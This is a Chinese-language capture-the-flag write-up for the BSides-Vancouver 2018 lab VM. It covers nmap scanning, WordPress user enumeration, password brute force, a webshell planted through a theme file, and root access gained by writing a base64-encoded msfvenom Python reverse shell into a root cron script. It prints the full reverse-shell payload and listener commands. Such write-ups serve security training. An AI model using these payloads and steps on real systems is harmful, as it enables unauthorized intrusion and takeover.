zoukankan      html  css  js  c++  java
  • [Write-up]BSides-Vancouver

    关于

    1. 下载链接
    2. 目标:拿到root用户目录下的flag.txt
    3. 全程无图!

    信息收集

    1. 因为虚拟机网络是设置Host-only,所以是vmnet1这张网卡,IP段为192.168.7.1/24
    2. nmap -T4 192.168.7.1/24 -A
    Nmap scan report for 192.168.7.128
    Host is up (0.00040s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 2.3.5
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_drwxr-xr-x    2 65534    65534        4096 Mar 03 17:52 public
    22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
    |   2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
    |_  256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
    80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
    | http-robots.txt: 1 disallowed entry 
    |_/backup_wordpress
    |_http-server-header: Apache/2.2.22 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 256 IP addresses (2 hosts up) scanned in 16.54 seconds
    
    1. 从上面可以看到服务器开放了21端口,对应的是FTP服务,还是可以匿名访问的。

      浏览器服务:ftp://192.168.7.128/public/users.txt.bk

    2. 还开放了80端口,robots.txt里有一个/backup_wordpress目录

      很明显式一个WordPress,直接上wpscan扫一下

    3. wpscan --url http://192.168.7.128/backup_wordpress/ --enumerate

    [+] WordPress theme in use: twentysixteen - v1.2
    
    [+] Name: twentysixteen - v1.2
     |  Last updated: 2018-05-17T00:00:00.000Z
     |  Location: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/
     |  Readme: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
    [!] The version is out of date, the latest version is 1.5
     |  Style URL: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/style.css
     |  Referenced style.css: wp-content/themes/twentysixteen/style.css
     |  Theme Name: Twenty Sixteen
     |  Theme URI: https://wordpress.org/themes/twentysixteen/
     |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
     |  Author: the WordPress team
     |  Author URI: https://wordpress.org/
    
    [+] Enumerating usernames ...
    [+] We identified the following 2 users:
        +----+-------+------+
        | ID | Login | Name |
        +----+-------+------+
        | 1  | admin | admi |
        | 2  | john  | joh  |
        +----+-------+------+
    [!] Default first WordPress username 'admin' is still used
    

    其实很多漏洞都是XSS或其他需要管理员交互的漏洞,所以很难利用。这里收集到的有博客用的主题,管理员的用户名为john,在博客写的也可以看出来。

    爆破

    1. wpscan --url http://192.168.7.128/backup_wordpress/ --username john --wordlist dic.txt

    2. 得到密码是enigma

    3. 登录改主题的404.php,getshell后发现没有root权限。

    4. 获取任务定时计划cat /etc/crontab

      # /etc/crontab: system-wide crontab
      # Unlike any other crontab you don't have to run the `crontab'
      # command to install the new version when you edit this file
      # and files in /etc/cron.d. These files also have username fields,
      # that none of the other crontabs do.
       
      SHELL=/bin/sh
      PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
       
      # m h dom mon dow user    command
      17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
      25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
      47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
      52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
      *  *    * * *   root    /usr/local/bin/cleanup
      
    5. 在这可以看到有一个用root权限运行的cleanup的脚本。

    6. 先生成反弹shell的payload

    kali-team@LTS:~$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.7.1 lport=4444 R
    
    [sudo] kali-team 的密码: 
    
    [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    
    [-] No arch selected, selecting arch: cmd from the payload
    
    No encoder or badchars specified, outputting raw payload
    
    Payload size: 601 bytes
    
    python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICAgICAgIHN1YnByb2Nlc3MgICAgICwgICAgICAgICBvcyAgICAgOyAgICAgICBob3N0PSIxOTIuMTY4LjcuMSIgICAgIDsgICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgLCAgICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDsgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAsICAgICAgICAgcG9ydCkpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDApICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDEpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDIpICAgICA7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
    
    
    1. 用nc监听本地的4444端口nc -lvp 4444
    2. 把payload复制到cleanup脚本里保存,坐等shell反弹回来
    3. 获取flag
    kali-team@LTS:~$ nc -lvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from [192.168.7.128] port 4444 [tcp/*] accepted (family 2, sport 51156)
    ls
    flag.txt
    id
    uid=0(root) gid=0(root) groups=0(root)
    cat flag.txt
    Congratulations!
    
    If you can read this, that means you were able to obtain root permissions on this VM.
    You should be proud!
    
    There are multiple ways to gain access remotely, as well as for privilege escalation.
    Did you find them all?
    
    @abatchy17
    

    write-up录像

    CTF-BSides Vancouver: 2018 (Workshop)

  • 相关阅读:
    ORACLE--Connect By、Level、Start With的使用(Hierarchical query-层次查询)
    小工具-ANT
    测试类。。。重写篇
    java代码----求最大值,平均值。。。
    java代码,输入n多个数,求其平均值,虽有重复,但是第二次,我就乱写了
    java代码求输入数的平均值~~~~
    java代码求输入的三个数的最大值
    java代码switch语句求分数等级
    java代码求分数等级的输出~~~
    java代码 求和1+1/2+1/3+1/4+1/5+1/6+.......+1/n 的值~~~~
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12210980.html
Copyright © 2011-2022 走看看